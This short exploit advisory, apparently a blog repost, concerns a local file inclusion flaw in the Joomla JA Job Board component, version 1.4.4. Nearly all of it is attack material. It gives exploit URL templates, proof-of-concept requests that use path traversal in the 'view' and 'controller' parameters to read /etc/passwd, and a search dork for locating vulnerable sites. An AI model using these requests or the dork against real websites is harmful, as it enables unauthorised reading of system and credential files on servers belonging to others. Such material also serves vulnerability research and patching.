[o] Joomla Component JA Job Board Multiple Local File Inclusion Vulnerability
Software : com_jajobboard version 1.4.4
Vendor : http://jobboard.joomlart.com/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_jajobboard&view=[LFI]
http://localhost/[path]/index.php?option=com_jajobboard&controller=[LFI]
[o] PoC
http://localhost/[path]/index.php?option=com_jajobboard&view=../../../../../../../../../../etc/passwd
http://localhost/[path]/index.php?option=com_jajobboard&controller=../../../../../../../../../../etc/passwd
[o] Dork
inru:”com_jajobboard”
0 comments:
Posting Komentar